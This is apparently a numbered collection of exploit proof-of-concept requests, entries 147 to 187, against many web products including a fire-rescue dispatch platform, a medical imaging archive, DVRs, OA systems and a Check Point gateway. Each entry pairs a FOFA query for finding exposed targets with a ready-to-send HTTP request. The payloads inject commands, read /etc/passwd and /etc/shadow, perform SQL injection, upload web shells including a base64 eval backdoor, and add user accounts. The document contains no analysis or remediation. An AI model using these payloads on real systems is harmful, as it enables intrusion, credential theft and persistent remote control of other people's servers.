GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

147. RaidenMAILD mail server v4.9.4 path traversal
CVE-2024-32399
FOFA:body="RaidenMAILD"
GET /webeditor/../../../windows/win.ini HTTP/1.1
Host: 127.0.0.1:81
Cache-Control: max-age=0
Connection: close

148. CrushFTP authentication bypass template injection
CVE-2024-4040
FOFA:body="CrushFTP"
PAYLOAD

149. AJ-Report open-source data dashboard remote command execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

150. AJ-Report 1.4.0 authentication bypass and remote code execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 339

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

151. AJ-Report 1.4.1 pageList SQL injection
FOFA:title="AJ-Report"
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

152. Progress Kemp LoadMaster remote command execution
CVE-2024-1212
Affected: LoadMaster <= 7.2.59.2 (GA)
LoadMaster <= 7.2.54.8 (LTSF)
LoadMaster <= 7.2.48.10 (LTS)
FOFA:body="LoadMaster"
JztsczsnOmRvZXNub3RtYXR0ZXI= is the base64 encoding of ';ls;':doesnotmatter
GET /access/set?param=enableapi&value=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
Accept-Encoding: gzip

153. Gradio arbitrary file read
CVE-2024-1561
FOFA:body="__gradio_mode__"
Step 1: request /config to obtain the component ids
http://x.x.x.x/config

Step 2: have the contents of /etc/passwd written to a temporary file
POST /component_server HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
Connection: close
Content-Length: 115
Content-Type: application/json
Accept-Encoding: gzip

{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}

Step 3: access the temporary file
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd

154. Tianwell (天维尔) fire rescue operation dispatch platform SQL injection
CVE-2024-3720
FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
Host: x.x.x.x
Content-Length: 106
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://x.x.x.x
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}

155. LyLme Spage (六零导航页) file.php arbitrary file upload
CVE-2024-34982
FOFA:title=="上网导航 - LyLme Spage"
POST /include/file.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Connection: close
Content-Length: 232
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
X-Requested-With: XMLHttpRequest

-----------------------------qttl7vemrsold314zg0f
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/png

<?php phpinfo();unlink(__FILE__);?>
-----------------------------qttl7vemrsold314zg0f--

Visit the file path echoed in the response: http://x.x.x.x/files/upload/img_664ab7fd14d2c.php

156. TBK DVR-4104/DVR-4216 OS command injection
CVE-2024-3721
FOFA:"Location: /login.rsp"
·TBK DVR-4104
·TBK DVR-4216
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"

POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 0
Cookie: uid=1
Accept-Encoding: gzip

157. 美特CRM upload.jsp arbitrary file upload
CNVD-2023-06971
FOFA:body="/common/scripts/basic.js"
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Content-Length: 709
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
Upgrade-Insecure-Requests: 1

------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
Content-Type: application/octet-stream

nyhelxrutzwhrsvsrafb
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="key"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="form"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="field"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filetitile"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filefolder"

null
------WebKitFormBoundary1imovELzPsfzp5dN--

Uploaded file location: http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp

158. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Generator: Masa CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x\'&previewid=1

159. 英飞达 (INFINITT) PACS (medical image archiving and communication system) WebJobUpload arbitrary file upload
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
POST /webservices/WebJobUpload.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Length: 1080
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml; charset=utf-8
Soapaction: "http://rainier/jobUpload"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<jobUpload xmlns="http://rainier">
<vcode>1</vcode>
<subFolder></subFolder>
<fileName>abcrce.asmx</fileName>
<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>
</jobUpload>
</soap:Body>
</soap:Envelope>

Uploaded file location: /1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")

160. Sonatype Nexus Repository 3 directory traversal and file read
CVE-2024-4956
FOFA:title="Nexus Repository Manager"
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

161. 科拓 smart parking fee system Webservice.asmx arbitrary file upload
FOFA:body="/KT_Css/qd_defaul.css"
Step 1: upload the file. The <fileName> field sets the file name and the <fileFlow> field carries the file content, which must be base64-encoded.
POST /Webservice.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 445
Content-Type: text/xml
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<UploadResume xmlns="http://tempuri.org/">
<ip>1</ip>
<fileName>../../../../dizxdell.aspx</fileName>
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
<tag>3</tag>
</UploadResume>
</soap:Body>
</soap:Envelope>

Uploaded file location: http://x.x.x.x/dizxdell.aspx

162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
FOFA: app="和丰山海-数字标牌"
POST /QH.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 583
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
Accept-Encoding: gzip

------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
Content-Type: application/octet-stream

<% response.write("ujidwqfuuqjalgkvrpqy") %>
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="action"

upload
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="responderId"

ResourceNewResponder
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="remotePath"

/opt/resources
------WebKitFormBoundaryeegvclmyurlotuey--

Uploaded file location: http://x.x.x.x/opt/resources/kjuhitjgk.aspx

163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
FOFA: icon_hash="-795291075"
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 293
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod

------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="name"

1.php
------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: image/jpeg

rvjhvbhwwuooyiioxega
------iiqvnofupvhdyrcoqyuujyetjvqgocod--

164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
FOFA: title="智慧综合管理平台登入"
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Length: 288
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

------dqdaieopnozbkapjacdbdthlvtlyl
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
Content-Type: image/jpeg

<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
------dqdaieopnozbkapjacdbdthlvtlyl--

Uploaded file location: http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx

165. OrangeHRM 3.3.3 SQL injection
CVE-2024-36428
FOFA: app="OrangeHRM-产品"
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))

166. 中成科信 ticketing management platform SeatMapHandler SQL injection
FOFA:body="技术支持:北京中成科信科技发展有限公司"
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
Host:
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 89

Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE

167. 精益 value management system DownLoad.aspx arbitrary file read
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

168. 宏景 (HJSOFT) EHR OutputCode arbitrary file read
FOFA:app="HJSOFT-HCM"
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close

169. 宏景 (HJSOFT) EHR downlawbase SQL injection
FOFA:app="HJSOFT-HCM"
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

170. 宏景 (HJSOFT) EHR DisplayExcelCustomReport arbitrary file read
FOFA:body="/general/sys/hjaxmanage.js"
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
Host: balalanengliang
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

filename=../webapps/ROOT/WEB-INF/web.xml

171. 通天星 CMSV6 vehicle GPS monitoring platform SQL injection
FOFA:body="/808gps/"
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close

172. DT HD license plate recognition camera arbitrary file read
FOFA:app="DT-高清车牌识别摄像机"
GET /../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

173. Check Point security gateway arbitrary file read
CVE-2024-24919
FOFA:app="Check_Point-SSL-Network-Extender"
POST /clients/MyCRL HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

aCSHELL/../../../../../../../etc/shadow

174. 金和 OA C6 FileDownLoad.aspx arbitrary file read
FOFA:app="金和网络-金和OA"
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

175. 金和 OA C6 IncentivePlanFulfill.aspx SQL injection
FOFA:app="金和网络-金和OA"
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

176. Telecom gateway configuration management system rewrite.php file upload
FOFA:body="img/login_bg3.png" && body="系统登录"
POST /manager/teletext/material/rewrite.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
Connection: close

------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
Content-Type: image/png

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="uploadtime"


------WebKitFormBoundaryOKldnDPT--

177. H3C router sensitive information disclosure
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../M60.cfg
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg

178. H3C campus network self-service system flexFileUpload arbitrary file upload
FOFA:header="/selfservice"
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Length: 252
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l

-----------------aqutkea7vvanpqy3rh2l
Content-Disposition: form-data; name="12234.txt"; filename="12234"
Content-Type: application/octet-stream
Content-Length: 255

12234
-----------------aqutkea7vvanpqy3rh2l--

Uploaded file location:
GET /imc/primepush/%2e%2e/flex/12234.txt

179. 建文 engineering management system arbitrary file read
POST /Common/DownLoad2.aspx HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

path=../log4net.config&Name=

180. 帮管客 CRM jiliyu SQL injection
FOFA:app="帮管客-CRM"
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

181. 润申信息科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20

182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

username=test1234&pwd=test1234&savedays=1

183. 广州图创 Interlib library cluster management system updOpuserPw SQL injection
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

184. 迅饶科技 X2Modbus gateway AddUser arbitrary user addition
FOFA:server="SunFull-Webs"
POST /soap/AddUser HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/xml, text/xml, */*; q=0.01
Content-Type: text/xml; charset=utf-8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest

insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')

185. 瑞友天翼 (REALOR) application virtualization system SQL injection
version < 7.0.5.1
FOFA:app="REALOR-天翼应用虚拟化系统"
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
Host: host

186. F-logic DataCube3 SQL injection
CVE-2024-31750
F-logic DataCube3 is a compact terminal measurement system for photovoltaic power generation systems.
FOFA:title=="DataCube3"
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450

187. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Mura CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

